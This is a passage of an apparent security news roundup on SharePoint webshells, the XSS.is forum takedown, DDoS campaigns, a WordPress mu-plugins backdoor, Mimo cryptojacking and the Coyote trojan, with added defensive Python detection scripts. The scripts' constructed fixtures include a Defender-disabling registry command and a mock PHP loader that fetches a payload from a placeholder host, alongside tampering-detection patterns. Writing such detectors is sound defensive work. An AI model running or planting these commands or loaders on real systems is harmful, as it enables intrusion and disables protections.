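    r"Windows Defender.*?(DisableAntiSpyware|DisableRealtimeMonitoring)", re.I)


def parse_w3c(lines):
    """Yield one dict per IIS W3C log row, taking column names from the #Fields: header."""
    fields = None
    for line in lines:
        if line.startswith("#Fields:"):
            fields = line.split()[1:]
        elif line.startswith("#") or not line.strip() or fields is None:
            continue
        else:
            parts = line.split()
            if len(parts) == len(fields):
                yield dict(zip(fields, parts))


def iis_webshell_hits(lines):
    """Return (client ip, method, uri) for every request that touches spinstall0.aspx."""
    return [(r["c-ip"], r["cs-method"], r["cs-uri-stem"])
            for r in parse_w3c(lines) if WEBSHELL_RE.search(r["cs-uri-stem"])]


def w3wp_spawned_shell(events):
    """The SharePoint worker process should never be the parent of a shell or of whoami."""
    return [e for e in events
            if e.parent.lower() == "w3wp.exe" and e.image.lower() in SHELL_CHILDREN]


def defender_tampering(events):
    """Command lines that flip Defender policy values off."""
    return [e for e in events if DEFENDER_TAMPER_RE.search(e.cmdline)]


def triage(iis_lines, events):
    """Combine the three signals; all three together match the reported chain."""
    findings = {
        "webshell_requests": iis_webshell_hits(iis_lines),
        "w3wp_shell_children": w3wp_spawned_shell(events),
        "defender_tampering": defender_tampering(events),
    }
    hits = sum(1 for v in findings.values() if v)
    findings["verdict"] = ("likely Storm-2603 chain" if hits == 3
                           else "investigate" if hits else "clean")
    return findings


# Constructed sample data: a compromised host SP01 plus unrelated benign noise.
SAMPLE_IIS = [
    "#Software: Microsoft Internet Information Services 10.0",
    "#Fields: date time s-ip cs-method cs-uri-stem cs-uri-query c-ip cs(User-Agent) sc-status",
    "2025-07-19 03:12:40 10.0.0.5 GET /sites/hr/default.aspx - 198.51.100.20 Mozilla/5.0 200",
    "2025-07-19 03:12:46 10.0.0.5 GET /_layouts/15/spinstall0.aspx - 203.0.113.7 Mozilla/5.0 200",
]
SAMPLE_EVENTS = [
    ProcEvent("SP01", "w3wp.exe", "cmd.exe", "cmd.exe /c whoami"),
    ProcEvent("SP01", "cmd.exe", "whoami.exe", "whoami"),
    ProcEvent("SP01", "services.exe", "reg.exe",
              r'reg add "HKLM\SOFTWARE\Policies\Microsoft\Windows Defender" '
              r"/v DisableAntiSpyware /t REG_DWORD /d 1 /f"),
    ProcEvent("WS07", "explorer.exe", "cmd.exe", "cmd.exe"),   # benign: a user opened a prompt
]

if __name__ == "__main__":
    for key, value in triage(SAMPLE_IIS, SAMPLE_EVENTS).items():
        print(key, value)
```

Each signal on its own is only a lead (an administrator can legitimately run whoami), which is why the verdict requires all three; in practice you would feed the functions your real IIS logs and EDR process telemetry rather than the constructed samples.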

“Cybersecurity is a common challenge faced by all countries and should be addressed jointly through dialogue and cooperation,” China’s Foreign Ministry Spokesperson Guo Jiakun said. “China opposes and fights hacking activities in accordance with the law. At the same time, we oppose smears and attacks against China under the excuse of cybersecurity issues.”

Europol Arrests XSS Forum Admin in Kyiv After 12-Year Run Operating Cybercrime Marketplace

Europol on Monday announced the arrest of the suspected administrator of XSS.is (formerly DaMaGeLaB), a notorious Russian-speaking cybercrime platform. The arrest, which took place in Kyiv, Ukraine, on July 22, 2025, was led by the French Police and Paris Prosecutor, in collaboration with Ukrainian authorities and Europol. The action is the result of an investigation that was launched by the French Police in July 2021. Coupled with the arrest, law enforcement has also taken control of the clearnet domain of XSS.is, greeting visitors with a seizure notice, “This domain has been seized by la Brigade de Lutte Contre la Cybercriminalité with assistance of the SBU Cyber Department.” “The forum, which had more than 50,000 registered users, served as a key marketplace for stolen data, hacking tools and illicit services,” the law enforcement agency said.

“It has long been a central platform for some of the most active and dangerous cybercriminal networks, used to coordinate, advertise and recruit.” The forum’s administrator, besides engaging in the technical operations of the service, is said to have enabled criminal activity by acting as a trusted third party to arbitrate disputes between criminals and guarantee the security of transactions. The unnamed individual is also believed to have run thesecure.biz, a private messaging platform specially built to cater to the needs of cybercriminals. Through these illicit ventures, the suspect is estimated to have made €7 million ($8.24 million) in profits from advertising and facilitation fees. “Investigators believe he has been active in the cybercrime ecosystem for nearly two decades, and maintained close ties to several major threat actors over the years,” Europol added.

According to the Paris Prosecutor, XSS.is has been active since 2013, acting as a hub for cybercrime ranging from access to compromised systems to ransomware-related services. It also offered an encrypted Jabber messaging server that let cybercriminals communicate anonymously. XSS.is, along with Exploit, has served as the backbone of the Russian-speaking cybercriminal ecosystem, with the threat actors on these forums primarily singling out non-Russian-speaking countries. Data shared by KELA shows that XSS currently has 48,750 registered users and more than 110,000 threads.

“To facilitate illicit transactions, the forum has a built-in reputation system,” KELA said. “Members can use a forum-appointed escrow service to ensure that deals are completed without scams, as well as add a deposit, contributing to their reputation.” The development comes a week after a Europol-led operation disrupted the online infrastructure associated with a pro-Russian hacktivist group known as NoName057(16) and the arrest of two people for conducting distributed denial-of-service (DDoS) attacks against Ukraine and its allies using a volunteer-driven Go-based tool called DDoSia. Recorded Future’s Insikt Group, in a report published this week, said the group targeted 3,776 unique hosts between July 1, 2024, and July 14, 2025, primarily government, public-sector, transportation, technology, media, and financial entities in European nations opposing Russia’s invasion of Ukraine. Ukrainian organizations accounted for the largest share of targets (29.47%), followed by France (6.09%), Italy (5.39%), Sweden (5.29%), Germany (4.60%), Israel (4.50%), Czechia (4%), Poland (4%), and the United Kingdom (3.30%).

The United States is a notable exclusion, despite its support for Ukraine. An extensive analysis of NoName057(16)’s infrastructure has laid bare a resilient, multi-tiered architecture consisting of rapidly rotated Tier 1 command-and-control (C2) servers and Tier 2 servers protected by access control lists (ACLs) to limit upstream access and maintain reliable C2 functionality. As many as 275 unique Tier 1 servers have been identified during the time period. “The threat group maintains a high operational tempo, averaging 50 unique targets daily, with intense bursts of activity correlating to geopolitical and military developments in Ukraine,” the Mastercard-owned cybersecurity company said.

“NoName057(16) uses a mixture of network and application-layer DDoS attacks, selecting methods designed to overwhelm server resources and disrupt availability. The threat group’s attack methodology is straightforward yet effective, prioritizing high-volume floods and resource exhaustion techniques.”

Hackers Deploy Stealth Backdoor in WordPress Mu-Plugins to Maintain Admin Access

Cybersecurity researchers have uncovered a new stealthy backdoor concealed within the “mu-plugins” directory in WordPress sites to grant threat actors persistent access and allow them to perform arbitrary actions. Must-use plugins (aka mu-plugins) are special plugins that are automatically activated on all WordPress sites in the installation. They are located in the “wp-content/mu-plugins” directory by default. What makes them an attractive option for attackers is that mu-plugins do not show in the default list of plugins on the Plugins page of wp-admin and cannot be disabled except by removing the plugin file from the must-use directory.

As a result, a piece of malware that leverages this technique can function quietly, without raising any red flags. In the infection spotted by web security company Sucuri, the PHP script in the mu-plugins directory (“wp-index.php”) serves as a loader to fetch a next-stage payload and save it in the WordPress database within the wp_options table under _hdra_core. The remote payload is retrieved from a URL that’s obfuscated using ROT13, a simple substitution cipher that replaces a letter with the 13th letter after it (i.e., A becomes N, B becomes O, C becomes P, and so forth). “The fetched content is then temporarily written to disk and executed,” security researcher Puja Srivastava said.

“This backdoor gives the attacker persistent access to the site and the ability to run any PHP code remotely.” Specifically, it injects a hidden file manager into the theme directory as “pricing-table-3.php,” permitting threat actors to browse, upload, or delete files. It also creates an administrator user named “officialwp” and then downloads a malicious plugin (“wp-bot-protect.php”) and activates it. Besides reinstating the infection in the event of deletion, the malware incorporates the ability to change the passwords of common administrator usernames, such as “admin,” “root,” and “wpsupport,” to a default password set by the attacker.

This also extends to its own “officialwp” user. In doing so, the threat actors can enjoy persistent access to the sites and perform malicious actions, while effectively locking out other administrators. This can range from data theft to injecting code that can serve malware to site visitors or redirect them to other scammy sites. “The attackers gain full administrator access and a persistent backdoor, allowing them to do anything on the site, from installing more malware to defacing it,” Srivastava said.

“The remote command execution and content injection features mean the attackers can change the malware’s behavior.” To mitigate these threats, it’s essential that site owners update WordPress, themes, and plugins periodically, secure accounts using two-factor authentication, and regularly audit all sections of the site, including theme and plugin files.
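Because mu-plugins never appear on the Plugins page, the audit the last paragraph recommends has to look at the directory and the database directly. The script below is an added example, not Sucuri's code: it decodes any str_rot13() literal in a mu-plugin to expose a hidden payload URL, looks for the dropped file names, and matches exported option and user names against the indicators in the write-up (_hdra_core, officialwp, pricing-table-3.php, wp-bot-protect.php). The database rows are passed in as plain lists (for instance exported with wp-cli) so it runs offline; demo() builds a constructed wp-content tree with a made-up payload host (example.com).

```python
"""Audit a WordPress install for the mu-plugins backdoor described above.

Added example, not Sucuri's tooling. It checks for the indicators the
write-up lists: a mu-plugin that hides its payload URL behind str_rot13(),
the _hdra_core row in wp_options, the "officialwp" administrator, and the
dropped files pricing-table-3.php and wp-bot-protect.php. Database rows
are passed in as plain lists (e.g. exported with wp-cli) so the audit runs
offline; demo() builds a throwaway, constructed wp-content tree.
"""
import codecs
import re
import tempfile
from pathlib import Path

ROT13_CALL = re.compile(r"str_rot13\s*\(\s*['\"]([^'\"]+)['\"]\s*\)")
IOC_OPTIONS = {"_hdra_core"}
IOC_USERS = {"officialwp"}
IOC_FILES = {"pricing-table-3.php", "wp-bot-protect.php"}


def decode_rot13_urls(php_source):
    """Decode every str_rot13('...') literal and keep those that turn out to be URLs."""
    urls = []
    for literal in ROT13_CALL.findall(php_source):
        plain = codecs.decode(literal, "rot_13")
        if plain.lower().startswith(("http://", "https://")):
            urls.append(plain)
    return urls


def audit_mu_plugins(mu_dir):
    """mu-plugins are auto-loaded and hidden from the Plugins page, so inspect each file."""
    findings = []
    for php in sorted(Path(mu_dir).glob("*.php")):
        urls = decode_rot13_urls(php.read_text(errors="replace"))
        if urls:
            findings.append({"file": php.name, "remote_urls": urls})
    return findings


def audit_dropped_files(wp_content):
    """Look anywhere under wp-content for the file names the campaign drops."""
    wp_content = Path(wp_content)
    return sorted(str(p.relative_to(wp_content))
                  for p in wp_content.rglob("*.php") if p.name in IOC_FILES)


def audit_db(option_names, usernames):
    """Match option and user names exported from wp_options / wp_users."""
    return {"options": sorted(set(option_names) & IOC_OPTIONS),
            "users": sorted(set(usernames) & IOC_USERS)}


def audit_site(wp_content, option_names, usernames):
    wp_content = Path(wp_content)
    report = {
        "mu_plugins": audit_mu_plugins(wp_content / "mu-plugins"),
        "dropped_files": audit_dropped_files(wp_content),
        **audit_db(option_names, usernames),
    }
    report["infected"] = any(report[k] for k in ("mu_plugins", "dropped_files", "options", "users"))
    return report


def demo():
    """Build a constructed wp-content tree that mimics the infection and audit it."""
    root = Path(tempfile.mkdtemp()) / "wp-content"
    (root / "mu-plugins").mkdir(parents=True)
    (root / "themes" / "twentytwentyfive").mkdir(parents=True)
    # Loader as described: the literal is ROT13 of http://example.com/payload (made-up host).
    (root / "mu-plugins" / "wp-index.php").write_text(
        "<?php\n$u = str_rot13('uggc://rknzcyr.pbz/cnlybnq');\n"
        "$c = file_get_contents($u);\nupdate_option('_hdra_core', $c);\n")
    (root / "mu-plugins" / "health-check.php").write_text("<?php // benign helper\n")
    (root / "themes" / "twentytwentyfive" / "pricing-table-3.php").write_text(
        "<?php // hidden file manager\n")
    options = ["siteurl", "blogname", "_hdra_core"]   # as exported from wp_options
    users = ["admin", "editor", "officialwp"]         # as exported from wp_users
    return audit_site(root, options, users)


if __name__ == "__main__":
    print(demo())
```

A clean site returns an empty list for every key, so the checks double as a regression test after cleanup; because the malware re-creates itself and resets admin passwords, re-run it after the password rotation rather than only before.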

Threat Actor Mimo Targets Magento and Docker to Deploy Crypto Miners and Proxyware

The threat actor behind the exploitation of vulnerable Craft Content Management System (CMS) instances has shifted its tactics to target Magento CMS and misconfigured Docker instances. The activity has been attributed to a threat actor tracked as Mimo (aka Hezb), which has a long history of leveraging N-day security flaws in various web applications to deploy cryptocurrency miners. “Although Mimo’s primary motivation remains financial, through cryptocurrency mining and bandwidth monetization, the sophistication of their recent operations suggests potential preparation for more lucrative criminal activities,” Datadog Security Labs said in a report published this week. Mimo’s exploitation of CVE-2025-32432, a critical security flaw in Craft CMS, for cryptojacking and proxyjacking was documented by Sekoia in May 2025.

Newly observed attack chains associated with the threat actor involve the abuse of undetermined PHP-FPM vulnerabilities in Magento e-commerce installations to obtain initial access, and then using it to drop GSocket, a legitimate open-source penetration testing tool, to establish persistent access to the host by means of a reverse shell. “The initial access vector is PHP-FPM command injection via a Magento CMS plugin, indicating that Mimo possesses multiple exploit capabilities beyond previously observed adversarial tradecraft,” researchers Ryan Simon, Greg Foss, and Matt Muir said. In an attempt to sidestep detection, the GSocket binary masquerades as a legitimate process or kernel-managed thread so that it blends in with other processes that may be running on the system. Another notable technique employed by the attackers is the use of in-memory payloads via memfd_create() to launch an ELF binary loader called “4l4md4r” without leaving any trace on disk.

The loader is then responsible for deploying the IPRoyal proxyware and the XMRig miner on the compromised machine but not before modifying the “/etc/ld.so.preload” file to inject a rootkit to conceal the presence of these artifacts. The distribution of a miner and proxyware underscores a two-pronged approach adopted by Mimo to maximize financial gain. The distinct revenue generation streams ensure that compromised machines’ CPU resources are hijacked to mine cryptocurrency, while the victims’ unused internet bandwidth is monetized for illicit residential proxy services. “Furthermore, the use of proxyware, which typically consumes minimal CPU, enables stealthy operation that prevents detection of the additional monetization even if the crypto miner’s resource usage is throttled,” the researchers said.

“This multi-layered monetization also enhances resilience: even if the crypto miner is detected and removed, the proxy component may remain unnoticed, ensuring continued revenue for the threat actor.” Datadog said it also observed the threat actors abusing misconfigured Docker instances that are publicly accessible to spawn a new container, within which a malicious command is executed to fetch an additional payload from an external server and execute it. Written in Go, the modular malware comes fitted with capabilities to achieve persistence, conduct file system I/O operations, terminate processes, and perform in-memory execution. It also serves as a dropper for GSocket and IPRoyal, and attempts to propagate to other systems via SSH brute-force attacks. “This demonstrates the threat actor’s willingness to compromise a diverse range of services – not just CMS providers – to achieve their objectives,” Datadog said.
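Three of the host-level techniques above leave artifacts a defender can check for directly: a memfd_create()-backed executable shows up as a "/memfd:" target of /proc/<pid>/exe, a userland binary posing as a kernel thread still has an exe link (genuine kernel threads have none), and a rootkit installed through /etc/ld.so.preload is one line in that file. The script below is an added example, not Datadog's tooling, covering those three checks; it takes the /proc root and the preload path as parameters so demo() can run it against a constructed fixture. The loader name 4l4md4r comes from the report; the GSocket binary path and the preload library name in the fixture are made up.

```python
"""Host triage for the Mimo Linux tradecraft described above.

Added example, not Datadog's tooling. It reads a /proc-style tree and an
ld.so.preload path (both passed in, so demo() can run it against a
constructed fixture) and reports:
  1. processes whose executable is a memfd: object (in-memory ELF loader),
  2. userland processes named like kernel threads ("[kworker/0:1]"), which
     real kernel threads never are, since they expose no /proc/<pid>/exe link,
  3. entries in /etc/ld.so.preload (rootkit injected into every process).
The loader name 4l4md4r is from the report; every path in the fixture is made up.
"""
import os
import tempfile
from pathlib import Path

KERNEL_THREAD_PREFIXES = ("kworker", "ksoftirqd", "kthreadd", "migration", "rcu_", "kswapd")


def _exe_target(pid_dir):
    try:
        return os.readlink(pid_dir / "exe")
    except OSError:
        return None  # kernel threads (and exited processes) expose no exe link


def _read(pid_dir, name):
    try:
        return (pid_dir / name).read_bytes().decode(errors="replace")
    except OSError:
        return ""


def scan_proc(proc_root="/proc"):
    """Flag memfd-backed executables and userland binaries wearing kernel-thread names."""
    findings = []
    for pid_dir in sorted(Path(proc_root).iterdir()):
        if not pid_dir.name.isdigit():
            continue
        exe = _exe_target(pid_dir)
        if exe is None:
            continue  # no exe link: a genuine kernel thread, not interesting here
        comm = _read(pid_dir, "comm").strip()
        argv0 = _read(pid_dir, "cmdline").split("\0")[0].strip("[]")
        entry = {"pid": int(pid_dir.name), "comm": comm, "exe": exe}
        if exe.startswith("/memfd:"):
            findings.append({**entry, "reason": "executable lives in memfd, never on disk"})
        elif comm.startswith(KERNEL_THREAD_PREFIXES) or argv0.startswith(KERNEL_THREAD_PREFIXES):
            findings.append({**entry, "reason": "kernel-thread name on a userland binary"})
    return findings


def check_ld_preload(path="/etc/ld.so.preload"):
    """Every entry here is loaded into each dynamically linked process; empty or absent is normal."""
    try:
        text = Path(path).read_text()
    except OSError:
        return []
    return [tok for line in text.splitlines() if not line.lstrip().startswith("#")
            for tok in line.split()]


def triage(proc_root="/proc", preload_path="/etc/ld.so.preload"):
    return {"processes": scan_proc(proc_root), "ld_preload": check_ld_preload(preload_path)}


def _fake_pid(root, pid, comm, cmdline, exe=None):
    """Write a minimal /proc/<pid> lookalike (comm, cmdline, optional exe symlink)."""
    d = root / str(pid)
    d.mkdir()
    (d / "comm").write_text(comm + "\n")
    (d / "cmdline").write_bytes(cmdline.encode() + b"\0" if cmdline else b"")
    if exe is not None:
        os.symlink(exe, d / "exe")  # dangling symlink is fine; readlink returns the target text


def demo():
    """Constructed fixture: loader in memfd, GSocket posing as a kworker, a real kthread, nginx."""
    tmp = Path(tempfile.mkdtemp())
    proc = tmp / "proc"
    proc.mkdir()
    _fake_pid(proc, 2, "kthreadd", "")                                          # real kernel thread
    _fake_pid(proc, 1234, "4l4md4r", "./4l4md4r", "/memfd:4l4md4r (deleted)")
    _fake_pid(proc, 1300, "kworker/0:1", "[kworker/0:1]", "/tmp/.x/gs-dbus")    # made-up GSocket path
    _fake_pid(proc, 1400, "nginx", "nginx: master process", "/usr/sbin/nginx")
    (tmp / "ld.so.preload").write_text("# hypothetical rootkit library\n/usr/lib/libkit.so\n")
    return triage(proc, tmp / "ld.so.preload")


if __name__ == "__main__":
    for key, value in triage().items():
        print(key, value)
```

Run triage() with the defaults as root on a live host; a preload rootkit that hides its own processes from /proc would defeat the first two checks, which is why the ld.so.preload check is kept separate and should also be confirmed from a clean boot medium.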


New Coyote Malware Variant Exploits Windows UI Automation to Steal Banking Credentials

The Windows banking trojan known as Coyote has become the first known malware strain to exploit the Windows accessibility framework called UI Automation (UIA) to harvest sensitive information. “The new Coyote variant is targeting Brazilian users, and uses UIA to extract credentials linked to 75 banking institutes’ web addresses and cryptocurrency exchanges,” Akamai security researcher Tomer Peled said in an analysis. Coyote, first revealed by Kaspersky in 2024, is known for targeting Brazilian users. It comes with capabilities to log keystrokes, capture screenshots, and serve overlays on top of login pages associated with financial enterprises.

Part of the Microsoft .NET Framework, UIA is a legitimate feature offered by Microsoft to allow screen readers and other assistive technology products to programmatically access user interface (UI) elements on a desktop. That UIA can be a potential pathway for abuse, including data theft, was previously demonstrated as a proof-of-concept (PoC) by Akamai in December 2024, with the web infrastructure company noting that it could be used to steal credentials or execute code. In some ways, Coyote’s latest modus operandi mirrors the various Android banking trojans that have been spotted in the wild, which often weaponize the operating system’s accessibility services to obtain valuable data. Akamai’s analysis found that the malware invokes the GetForegroundWindow() Windows API in order to extract the active window’s title and compare it against a hard-coded list of web addresses belonging to targeted banks and cryptocurrency exchanges.

“If no match is found Coyote will then use UIA to parse through the UI child elements of the window in an attempt to identify browser tabs or address bars,” Peled explained. “The content of these UI elements will then be cross-referenced with the same list of addresses from the first comparison.” As many as 75 different financial institutions are targeted by the latest version of the malware, up from 73 documented by Fortinet FortiGuard Labs earlier this January. “Without UIA, parsing the sub-elements of another application is a nontrivial task,” Akamai added. “To be able to effectively read the contents of sub-elements within another application, a developer would need to have a very good understanding of how the specific target application is structured.” “Coyote can perform checks, regardless of whether the malware is online or operating in an offline mode.

This increases the chances of successfully identifying a victim’s bank or crypto exchange and stealing their credentials.”